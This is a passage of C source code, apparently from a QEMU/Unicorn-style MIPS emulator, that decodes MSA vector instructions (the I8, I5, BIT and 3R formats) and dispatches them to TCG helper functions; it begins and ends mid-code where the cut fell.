0xff; uint8_t ws = (ctx->opcode >> 11) & 0x1f; uint8_t wd = (ctx->opcode >> 6) & 0x1f; TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); TCGv_i32 tws = tcg_const_i32(tcg_ctx, ws); TCGv_i32 ti8 = tcg_const_i32(tcg_ctx, i8); switch (MASK_MSA_I8(ctx->opcode)) { case OPC_ANDI_B: gen_helper_msa_andi_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, ti8); break; case OPC_ORI_B: gen_helper_msa_ori_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, ti8); break; case OPC_NORI_B: gen_helper_msa_nori_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, ti8); break; case OPC_XORI_B: gen_helper_msa_xori_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, ti8); break; case OPC_BMNZI_B: gen_helper_msa_bmnzi_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, ti8); break; case OPC_BMZI_B: gen_helper_msa_bmzi_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, ti8); break; case OPC_BSELI_B: gen_helper_msa_bseli_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, ti8); break; case OPC_SHF_B: case OPC_SHF_H: case OPC_SHF_W: { uint8_t df = (ctx->opcode >> 24) & 0x3; if (df == DF_DOUBLE) { generate_exception_end(ctx, EXCP_RI); } else { TCGv_i32 tdf = tcg_const_i32(tcg_ctx, df); gen_helper_msa_shf_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, ti8); tcg_temp_free_i32(tcg_ctx, tdf); } } break; default: MIPS_INVAL("MSA instruction"); generate_exception_end(ctx, EXCP_RI); break; } tcg_temp_free_i32(tcg_ctx, twd); tcg_temp_free_i32(tcg_ctx, tws); tcg_temp_free_i32(tcg_ctx, ti8); } static void gen_msa_i5(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; #define MASK_MSA_I5(op) (MASK_MSA_MINOR(op) | (op & (0x7 << 23))) uint8_t df = (ctx->opcode >> 21) & 0x3; int8_t s5 = (int8_t) sextract32(ctx->opcode, 16, 5); uint8_t u5 = (ctx->opcode >> 16) & 0x1f; uint8_t ws = (ctx->opcode >> 11) & 0x1f; uint8_t wd = (ctx->opcode >> 6) & 0x1f; TCGv_i32 tdf = tcg_const_i32(tcg_ctx, df); TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); TCGv_i32 tws = tcg_const_i32(tcg_ctx, ws); TCGv_i32 timm = tcg_temp_new_i32(tcg_ctx); tcg_gen_movi_i32(tcg_ctx, timm, u5); switch (MASK_MSA_I5(ctx->opcode)) { case OPC_ADDVI_df: gen_helper_msa_addvi_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); break; case OPC_SUBVI_df: gen_helper_msa_subvi_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); break; case OPC_MAXI_S_df: tcg_gen_movi_i32(tcg_ctx, timm, s5); gen_helper_msa_maxi_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); break; case OPC_MAXI_U_df: gen_helper_msa_maxi_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); break; case OPC_MINI_S_df: tcg_gen_movi_i32(tcg_ctx, timm, s5); gen_helper_msa_mini_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); break; case OPC_MINI_U_df: gen_helper_msa_mini_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); break; case OPC_CEQI_df: tcg_gen_movi_i32(tcg_ctx, timm, s5); gen_helper_msa_ceqi_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); break; case OPC_CLTI_S_df: tcg_gen_movi_i32(tcg_ctx, timm, s5); gen_helper_msa_clti_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); break; case OPC_CLTI_U_df: gen_helper_msa_clti_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); break; case OPC_CLEI_S_df: tcg_gen_movi_i32(tcg_ctx, timm, s5); gen_helper_msa_clei_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); break; case OPC_CLEI_U_df: gen_helper_msa_clei_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); break; case OPC_LDI_df: { int32_t s10 = sextract32(ctx->opcode, 11, 10); tcg_gen_movi_i32(tcg_ctx, timm, s10); gen_helper_msa_ldi_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, timm); } break; default: MIPS_INVAL("MSA instruction"); generate_exception_end(ctx, EXCP_RI); break; } tcg_temp_free_i32(tcg_ctx, tdf); tcg_temp_free_i32(tcg_ctx, twd); tcg_temp_free_i32(tcg_ctx, tws); tcg_temp_free_i32(tcg_ctx, timm); } static void gen_msa_bit(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; #define MASK_MSA_BIT(op) (MASK_MSA_MINOR(op) | (op & (0x7 << 23))) uint8_t dfm = (ctx->opcode >> 16) & 0x7f; uint32_t df = 0, m = 0; uint8_t ws = (ctx->opcode >> 11) & 0x1f; uint8_t wd = (ctx->opcode >> 6) & 0x1f; TCGv_i32 tdf; TCGv_i32 tm; TCGv_i32 twd; TCGv_i32 tws; if ((dfm & 0x40) == 0x00) { m = dfm & 0x3f; df = DF_DOUBLE; } else if ((dfm & 0x60) == 0x40) { m = dfm & 0x1f; df = DF_WORD; } else if ((dfm & 0x70) == 0x60) { m = dfm & 0x0f; df = DF_HALF; } else if ((dfm & 0x78) == 0x70) { m = dfm & 0x7; df = DF_BYTE; } else { generate_exception_end(ctx, EXCP_RI); return; } tdf = tcg_const_i32(tcg_ctx, df); tm = tcg_const_i32(tcg_ctx, m); twd = tcg_const_i32(tcg_ctx, wd); tws = tcg_const_i32(tcg_ctx, ws); switch (MASK_MSA_BIT(ctx->opcode)) { case OPC_SLLI_df: gen_helper_msa_slli_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); break; case OPC_SRAI_df: gen_helper_msa_srai_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); break; case OPC_SRLI_df: gen_helper_msa_srli_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); break; case OPC_BCLRI_df: gen_helper_msa_bclri_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); break; case OPC_BSETI_df: gen_helper_msa_bseti_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); break; case OPC_BNEGI_df: gen_helper_msa_bnegi_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); break; case OPC_BINSLI_df: gen_helper_msa_binsli_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); break; case OPC_BINSRI_df: gen_helper_msa_binsri_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); break; case OPC_SAT_S_df: gen_helper_msa_sat_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); break; case OPC_SAT_U_df: gen_helper_msa_sat_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); break; case OPC_SRARI_df: gen_helper_msa_srari_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); break; case OPC_SRLRI_df: gen_helper_msa_srlri_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); break; default: MIPS_INVAL("MSA instruction"); generate_exception_end(ctx, EXCP_RI); break; } tcg_temp_free_i32(tcg_ctx, tdf); tcg_temp_free_i32(tcg_ctx, tm); tcg_temp_free_i32(tcg_ctx, twd); tcg_temp_free_i32(tcg_ctx, tws); } static void gen_msa_3r(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; #define MASK_MSA_3R(op) (MASK_MSA_MINOR(op) | (op & (0x7 << 23))) uint8_t df = (ctx->opcode >> 21) & 0x3; uint8_t wt = (ctx->opcode >> 16) & 0x1f; uint8_t ws = (ctx->opcode >> 11) & 0x1f; uint8_t wd = (ctx->opcode >> 6) & 0x1f; TCGv_i32 tdf = tcg_const_i32(tcg_ctx, df); TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); TCGv_i32 tws = tcg_const_i32(tcg_ctx, ws); TCGv_i32 twt = tcg_const_i32(tcg_ctx, wt); switch (MASK_MSA_3R(ctx->opcode)) { case OPC_BINSL_df: switch (df) { case DF_BYTE: gen_helper_msa_binsl_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_binsl_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_binsl_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_binsl_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_BINSR_df: switch (df) { case DF_BYTE: gen_helper_msa_binsr_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_binsr_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_binsr_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_binsr_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_BCLR_df: switch (df) { case DF_BYTE: gen_helper_msa_bclr_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_bclr_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_bclr_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_bclr_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_BNEG_df: switch (df) { case DF_BYTE: gen_helper_msa_bneg_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_bneg_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_bneg_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_bneg_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_BSET_df: switch (df) { case DF_BYTE: gen_helper_msa_bset_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_bset_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_bset_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_bset_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_ADD_A_df: switch (df) { case DF_BYTE: gen_helper_msa_add_a_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_add_a_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_add_a_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_add_a_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_ADDS_A_df: switch (df) { case DF_BYTE: gen_helper_msa_adds_a_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_adds_a_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_adds_a_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_adds_a_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_ADDS_S_df: switch (df) { case DF_BYTE: gen_helper_msa_adds_s_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_adds_s_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_adds_s_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_adds_s_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_ADDS_U_df: switch (df) { case DF_BYTE: gen_helper_msa_adds_u_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_adds_u_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_adds_u_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_adds_u_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_ADDV_df: switch (df) { case DF_BYTE: gen_helper_msa_addv_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_addv_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_addv_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_addv_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_AVE_S_df: switch (df) { case DF_BYTE: gen_helper_msa_ave_s_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_ave_s_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_ave_s_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_ave_s_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_AVE_U_df: switch (df) { case DF_BYTE: gen_helper_msa_ave_u_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_ave_u_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_ave_u_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_ave_u_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_AVER_S_df: switch (df) { case DF_BYTE: gen_helper_msa_aver_s_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_aver_s_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_aver_s_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_aver_s_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_AVER_U_df: switch (df) { case DF_BYTE: gen_helper_msa_aver_u_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_aver_u_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_aver_u_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_aver_u_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_CEQ_df: switch (df) { case DF_BYTE: gen_helper_msa_ceq_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_ceq_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_ceq_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_ceq_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_CLE_S_df: switch (df) { case DF_BYTE: gen_helper_msa_cle_s_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_cle_s_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_cle_s_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_cle_s_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_CLE_U_df: switch (df) { case DF_BYTE: gen_helper_msa_cle_u_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_cle_u_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_cle_u_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_cle_u_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_CLT_S_df: switch (df) { case DF_BYTE: gen_helper_msa_clt_s_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_clt_s_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_clt_s_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_clt_s_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_CLT_U_df: switch (df) { case DF_BYTE: gen_helper_msa_clt_u_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_clt_u_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_clt_u_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_clt_u_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_DIV_S_df: switch (df) { case DF_BYTE: gen_helper_msa_div_s_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_div_s_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_div_s_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_div_s_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_DIV_U_df: switch (df) { case DF_BYTE: gen_helper_msa_div_u_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_div_u_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_div_u_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_div_u_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_MAX_A_df: switch (df) { case DF_BYTE: gen_helper_msa_max_a_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_max_a_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_max_a_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_max_a_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_MAX_S_df: switch (df) { case DF_BYTE: gen_helper_msa_max_s_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_max_s_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_max_s_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_max_s_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_MAX_U_df: switch (df) { case DF_BYTE: gen_helper_msa_max_u_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_max_u_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_max_u_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_max_u_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_MIN_A_df: switch (df) { case DF_BYTE: gen_helper_msa_min_a_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_min_a_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_min_a_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_min_a_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_MIN_S_df: switch (df) { case DF_BYTE: gen_helper_msa_min_s_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_min_s_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_min_s_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_min_s_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_MIN_U_df: switch (df) { case DF_BYTE: gen_helper_msa_min_u_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_min_u_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_min_u_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_min_u_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_MOD_S_df: switch (df) { case DF_BYTE: gen_helper_msa_mod_s_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_mod_s_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_mod_s_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_mod_s_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_MOD_U_df: switch (df) { case DF_BYTE: gen_helper_msa_mod_u_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_mod_u_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_mod_u_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_mod_u_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_ASUB_S_df: switch (df) { case DF_BYTE: gen_helper_msa_asub_s_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_asub_s_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_asub_s_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_asub_s_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_ASUB_U_df: switch (df) { case DF_BYTE: gen_helper_msa_asub_u_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_asub_u_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_asub_u_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_asub_u_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_ILVEV_df: switch (df) { case DF_BYTE: gen_helper_msa_ilvev_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_ilvev_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_ilvev_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_ilvev_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_ILVOD_df: switch (df) { case DF_BYTE: gen_helper_msa_ilvod_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_ilvod_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_ilvod_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_ilvod_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_ILVL_df: switch (df) { case DF_BYTE: gen_helper_msa_ilvl_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_ilvl_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_ilvl_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_ilvl_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_ILVR_df: switch (df) { case DF_BYTE: gen_helper_msa_ilvr_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_ilvr_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_ilvr_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_ilvr_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_PCKEV_df: switch (df) { case DF_BYTE: gen_helper_msa_pckev_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_pckev_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_pckev_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_pckev_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_PCKOD_df: switch (df) { case DF_BYTE: gen_helper_msa_pckod_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_pckod_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_pckod_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_pckod_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_SLL_df: switch (df) { case DF_BYTE: gen_helper_msa_sll_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_sll_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_sll_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_sll_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_SRA_df: switch (df) { case DF_BYTE: gen_helper_msa_sra_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_sra_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_sra_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_sra_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_SRAR_df: switch (df) { case DF_BYTE: gen_helper_msa_srar_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_srar_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_srar_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_srar_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_SRL_df: switch (df) { case DF_BYTE: gen_helper_msa_srl_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_srl_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_srl_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_srl_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_SRLR_df: switch (df) { case DF_BYTE: gen_helper_msa_srlr_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_HALF: gen_helper_msa_srlr_h(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_WORD: gen_helper_msa_srlr_w(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case DF_DOUBLE: gen_helper_msa_srlr_d(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; } break; case OPC_SUBS_S_df: gen_helper_msa_subs_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_MULV_df: gen_helper_msa_mulv_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); break; case OPC_SLD_df: 